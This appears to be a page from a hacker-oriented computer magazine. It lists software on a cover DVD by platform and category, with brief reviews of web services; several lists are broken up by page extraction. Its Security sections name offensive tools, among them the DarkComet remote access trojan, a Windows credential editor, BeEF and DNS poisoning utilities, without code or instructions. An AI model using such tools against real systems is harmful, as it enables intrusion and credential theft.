Connex Network Manager
ExpanDrive
Fiddler 2.3.3.3
freeSSHd 1.2.6
GDocsDrive
GeeMail
mRemote 1.50
MyEnTunnel 3.4.2.1
PuTTY Connection Manager
Royal TS 1.7.2

>Multimedia
8 Skin Pack 1.0 For 7
Gmail Notifier Pro 2.1
Lion Skin Pack 4.0 For Win 7
Marble 1.1.0
MPTagThat 2.0.4
Office Tabs 6.51
Pulse Beta 1
SmillaEnlarger 0.9.0
Songr 1.9.20
Swish 0.4.6
Tiny Burner 1.0
Tunatic v1.0.1b

>Misc
CameraMouse2011
Depeche View 1.4.6
Ditto-cp 3.17
Dolphin Text Editor Menu 1.8
Duplicate Commander 2.1
Explorer7Fixes 1.0.0.2
FluffyApp 1.0b9
Free Time Tracker 1.0
GeeTeeDee 0.1.175
iPrint 6
Klok Free 2.3.2
MadAppLauncher 1.0.0.0
min.us for windows
Orbit Downloader 4.1.0.0
Shapeshifter 4.01
SnakeTail 1.3
Windows Double Explorer 0.4

>Devel
AutoGen 5.11.5
Bashdb 4.2-0.7
Boa Constructor 0.2.3
CVS 1.11.23

>>UNIX
>Desktop
Audacious 2.5.0
Blender 2.57
DraftSight
Fvwm 2.6.0
GIMP 2.7.2
Kdenlive 0.8.0
Kupfer 2.06
Marble 1.1
Notecase 1.9.8
Pdfmod 0.9.1
PyBookReader 0.5.0
Rawstudio 2.0
SnapFly 0.8
SSHMenu 3.18
TaskJuggler 0.0.11
Texmaker 3.0.2
ThinkingRock 2.2.1
UMPlayer 0.92

>System
Comodo Antivirus for Windows
Comodo Firewall for Windows
Dropboxifier v0.1.6
Folder Size 1.9.0.0
Free VM Configuration Tool 1.0
FreeFileSync 3.16
MyEventViewer 1.55
Q-Dir 4.54
SafeHouse Explorer 3.01
WhatIsHang 1.00

>Security
DarkComet-RAT v3.3 FWB
DB Audit 4.2.29
Google Hack Database 1.1
Hatkit Proxy v1
PANFinder
PVDasm v1.7b
RawCap
REC Studio 4
Retina Scanner 5.12.1
SWFRETools
TCHunt v1.5
V3RITY Data Block Examiner for
Oracle
Vistumbler v10.1 beta 5
Volatility 1.3Beta
Watcher 1.5.2
Windows Credentials Editor v1.2

streamwriter 2.0.0.0
TeraTerm Pro Web 3.1.3
Tunngle 4.3.2.0
UltraVNC 1.0.9.5
USBWebserver V8
Wireshark 1.4.6
Yakoon 2.0.0

>Server
Apache 2.2.17
BIND 9.8.0
Boa 0.94.13
CUPS 1.4.6
DHCP 4.2.1
Dnsmasq 2.57

>Security
ArpON 2.0
BeEF 0.4.2.4 alpha
BFBTester 2.0.1
BodgeIt 1.1.0
Cameloid 1.8c
DNSpoison 1.0
Google Hack DB Tool 1.1
Hatkit Proxy 0.5.1
Netifera 1.0
oclHashcat lite 0.05
Portsentry 1.2
Pytbull Testing Framework 0.3
Sqlmap 0.9
sslsnoop 0.6
SWFRETools
theHarvester 2.0
Yersinia 0.7.1
Zed Attack Proxy 1.2.0

>Net
Autossh 1.4b
Bandwidthd 2.0.1
BitlBee 3.0.2
BitStormLite 0.2q
Bit-Twist 1.1
Cftp 0.12
Dante 1.2.3
Dns2tcp 0.5.2
dnsproxy 1.16
ffproxy 1.6
Firefox 4.0.1
Google Chrome 11.0.696.57
Jabberd 2.2.13
Knockd 0.5
NOC 0.6.3
Opera 11.10
Psi 0.14
Skype 2.2

>Games
Family Farm

DDD 3.3.12
Groovy 1.8
HT 2.0.18
Indent 2.2.9
libvirt 0.9.0
LLVM 2.9
NetBeans 7.0
PCC 1.0
Pydb 1.26
PyPy 1.5
QtSDK 1.1
SPE 0.8.4
Tapper
XtraBackup 1.6

>>MAC
Blender 2.57b
BlueGriffon 1.0pre1
Bricksmith 2.5
EasyFind 4.7.2
eMaps 2.2.5
Firefox 4.0.1
Google Chrome 11.0.696.57
Growl 1.2.1
Gruml 0.9.25.121
ipswDownloader 0.4
Pashua 0.9.4.5
Silverlight 4.0.60310.0
SmartSVN 6.6.7
TenFourFox 4.0.1
TeXMaker 3.0.2
TeXShop 2.41
The Unarchiver 2.7.1
xACT 2.11
XMenu 1.9.3
YoruFukurou 2.4

>X-distr
CentOS 5.6

>System
Alsa 1.0.24
Bochs 2.4.6
ClusterSSH 3.28
Conky 1.8.1
Cupt 2.0.0
Linux Kernel 2.6.38.5
Loggerfs 0.5
NetXMS 1.0.11
QKernelBuilder 1.2
Sadms 2.0.15
SystemTap 1.4
Watsup 1.9
Xnee 3.09

Exim 4.75
nginx 1.0.0
Nut 2.6.0
OpenLDAP 2.4.25
OpenSSH 5.8
OpenVPN 2.2.0
Postfix 2.8.2
PostgreSQL 9.0.4
Samba 3.5.8
Sendmail 8.14.4
Snort 2.9.0
Squid 3.1.12

>>DVD 06 (149) 2011

>>WINDOWS
>Development
Aptana Studio 3.0.1
Assembly Studio 1.0
Bamcompile 1.21
CodeCompare 2.60.5
HexAssistant 2.7
IncrediBuild 3.51
NetBeans 7.0
PE Explorer
PowerGUI 2.4.0
Programmers Notepad 2.2
py2exe 0.6.9
Python Tools for Visual Studio
Beta2
Qt Creator 2.2
Selenium IDE 1.0.10
SQL Decryptor 1.1.0
Titanium Developer
UNITS

HTTP://WWW2

DUSHARE
dushare.com
Sharing a big file with a friend usually means uploading it to a file host like rapidshare.com and sending a link. DuShare skips the upload: with a Flash-based channel the file goes peer-to-peer straight from your browser to the recipient's, and the site only brokers the connection, so nothing has to be stored on a server in between.

URLQUERY
urlquery.net
An online service for checking suspicious links. Give urlQuery a URL and it visits the page itself and reports what happened: which Java applets were loaded, the full sequence of HTTP requests and what else the page pulled in. Useful for a look at a link you suspect leads to an exploit pack before you open it yourself.

INSTAPAPER
instapaper.com
You find a long article and have no time for it now. Instapaper's Read Later bookmarklet saves it with one click, and you read it afterwards in a clean text view on whatever is at hand: the site itself, the iPad or iPhone app, or a Kindle.

CODECANYON
codecanyon.net
A marketplace for ready-made code. CodeCanyon sells scripts and components for the web (JavaScript, PHP scripts, .NET, plugins, CSS, HTML5) and for mobile (iOS, Android). Prices start at $5; the JavaScript category alone holds 1065 items. Worth a look whether you are buying or selling.


Previous issue, 05 (148) 2011 (back issues 90 rub. at www.xakep.ru/podpiska):
PWN2OWN, p. 82
VoIP, p. 60
PHREAKING, p. 130
Linux on a USB stick
Red.Button: Twitter
MS08-067: Windows, p. 68